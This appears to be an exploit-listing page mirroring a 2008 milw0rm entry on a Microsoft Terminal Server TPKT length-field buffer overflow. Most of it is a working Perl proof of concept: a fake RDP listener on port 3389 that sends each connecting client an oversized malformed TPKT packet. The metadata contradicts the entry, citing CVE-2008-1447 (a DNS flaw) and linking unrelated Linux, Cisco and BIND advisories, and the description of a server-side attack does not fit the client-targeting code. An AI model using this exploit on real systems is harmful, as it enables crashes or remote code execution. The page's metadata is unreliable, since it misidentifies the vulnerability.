header-logo
Suggest Exploit
vendor:
Windows
by:
milw0rm.com
6.8
CVSS
MEDIUM
Buffer Overflow
120
CWE
Product Name: Windows
Affected Version From: Windows 2000
Affected Version To: Windows 2008
Patch Exists: YES
Related CWE: CVE-2008-1447
CPE: o:microsoft:windows
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0458/https://www.rapid7.com/db/vulnerabilities/cisco-sa-20080924-iosips/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-3630/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-3905/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-3905/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-3905/https://www.rapid7.com/db/vulnerabilities/linuxrpm-SUSE-SR-2008-017-vuln1/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-3337/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-3337/https://www.rapid7.com/db/vulnerabilities/centos_linux-cesa-2008-0533/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0014-cve-2008-1447/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2008-1447/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0533/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0789/https://www.rapid7.com/db/vulnerabilities/dns-kaminsky-bug-bind/https://www.rapid7.com/db/vulnerabilities/dns-kaminsky-bug/https://www.rapid7.com/db/vulnerabilities/juniper-junos-os-jsa10403/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-959d384d-6b59-11dd-9d79-001fc61c2a55/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-1447/https://www.rapid7.com/db/vulnerabilities/apple-osx-bind-cve-2008-1447/https://www.rapid7.com/db/?q=CVE-2008-1447&type=&page=2https://www.rapid7.com/db/?q=CVE-2008-1447&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Microsoft Terminal Server Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Terminal Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the TPKT length field. By sending a specially crafted packet with an overly large length field, an attacker can cause a stack-based buffer overflow. This can be leveraged to execute arbitrary code under the context of the SYSTEM user.

Mitigation:

Microsoft has released a set of patches for Windows 2000, XP, 2003, Vista, and 2008 to address this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696

use warnings;
use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

while(my $c = $sock->accept())
{
        print $c        "\x03"                          .# TPKT version
                        "\x00"                          .# reserved
                        "\x00\x01"                      .# evil length here 
                        "\x06\xd0\x00\x00\x12\x34\x00"  .
                        "\x41" x 204942;

        sleep 1;
        close $sock;
}

# milw0rm.com [2008-05-08]

Navigation

Suggest Exploit

Services By CQR